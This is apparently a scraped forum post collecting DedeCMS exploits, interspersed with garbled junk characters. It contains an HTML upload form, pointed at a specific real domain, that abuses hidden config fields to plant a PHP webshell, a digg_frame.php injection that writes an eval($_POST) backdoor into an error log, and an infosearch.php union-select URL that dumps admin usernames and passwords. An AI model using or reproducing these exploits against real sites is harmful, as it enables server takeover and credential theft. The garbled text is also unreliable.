<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>" T1 d1 B5 M* H9 m: x) S
</head> c0 p G: Q! V3 L4 O
<body style="FONT-SIZE: 9pt">
, l' f, P5 @* M4 k7 e# C---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />5 ^7 \5 O( d: U* G* e" v
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>; _% d7 Q% w5 m \7 U
<input type='hidden' name='activepath' value='/data/cache/' />
' x7 B* |' r% Q; A<input type='hidden' name='cfg_basedir' value='../../' />: I! K# m) {, R- a
<input type='hidden' name='cfg_imgtype' value='php' />8 ]" p f5 ~8 Y% o: e
<input type='hidden' name='cfg_not_allowall' value='txt' />
& I& ? O. ?; x5 m; B<input type='hidden' name='cfg_softtype' value='php' />
% _9 R* H/ U0 C: P7 v<input type='hidden' name='cfg_mediatype' value='php' />5 [) Q: {8 s; T6 o
<input type='hidden' name='f' value='form1.enclosure' />& v7 ?% ~4 `0 X
<input type='hidden' name='job' value='upload' />7 B0 Y( G" o7 P0 C6 ^' x; _# x+ T
<input type='hidden' name='newname' value='fly.php' />$ ^; O( u8 n2 K" ?
Select U Shell <input type='file' name='uploadfile' size='25' />- E7 O4 x+ S1 ]- ^; r; x6 _
<input type='submit' name='sb1' value='确定' />
a: K1 N- ~# ~9 }</form># f- W" |8 D/ I. H
<br />It's just a exp for the bug of Dedecms V55...<br />
e8 y3 ?0 l0 |, kNeed register_globals = on...<br />
' b# t% {3 m A6 EFun the game,get a webshell at /data/cache/fly.php...<br />4 K* _: I. q1 ^" G2 u
</body>
) V0 R% [& T/ a" i! `</html>9 i% W/ z' w0 P3 p6 y, }
1 E. S6 l, T O6 i0 w7 D
+ R8 _$ g7 N7 g6 b8 d5 ?
6 W% u! n9 a9 ^2 R. S& F9 u4 f7 |1 }- d; Q
7 p0 q& q$ Q+ o0 [2 b/ D
. W; n! V# i. S! e! i; d2 d7 |' |) ?, A
3 J/ U& ~0 l* @9 Z. {' V& D+ X% m) R% K- H! r
1 P. t m) o% p2 Y. T织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞, z1 _6 }" C( e
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。( |! f; r7 S s# b5 J" ^
1. 访问网址:% E& R& E6 P4 m: J+ i' J8 ?% Z
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>8 e. I; Q2 e! s& N9 f
可看见错误信息
* a/ l! X7 l K8 b% m4 X, V( L
" \: E/ u6 H Z4 J" z' ]2 @# q: u" |- ^1 o$ f# B
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
4 [& ]9 |; G G' F# j& v4 fint(3) Error: Illegal double '1024e1024' value found during parsing4 V% C' R9 i: J" v5 q6 H7 F$ ~, X
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
- ?( ~4 ^6 Y5 q. E+ Z f3 H4 X, L9 E# b- E; Q( ?3 x# u6 r
) T9 R9 ^! o& S" q4 I6 W
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是. L! X1 Y, l3 s% G$ E
! X- Z% H# L; h9 t/ d. f* V5 L8 E. i$ E- x! b N' n/ d
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>% D+ |, {. P# v7 H, o2 _$ A
6 c4 I3 v. Z, o, s
+ z. M8 n0 J* |/ N/ G
按确定后的看到第2步骤的信息表示文件木马上传成功.3 X8 z& V$ j8 _/ w% X' K5 T
( {( f( r' Z' e& B7 S5 y
4 } D. s, F/ v. _& M B4 ?$ _$ r: Q% {; q
: W+ l) k/ J( v
. E' c) h1 v$ t9 b+ `% c
( B u" X' R, y$ n
) H5 U; {5 @- u3 @( G1 m3 b
4 \% _4 \& X+ f- @% y; z8 c7 m/ D% P5 x; Z0 |: r
& a A: j( {2 F- O5 O3 n8 y0 u$ I9 G2 s; O' e
# _. D( U7 p: }6 m7 B
织梦(DedeCms)plus/infosearch.php 文件注入漏洞7 S" J* }* D ^
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对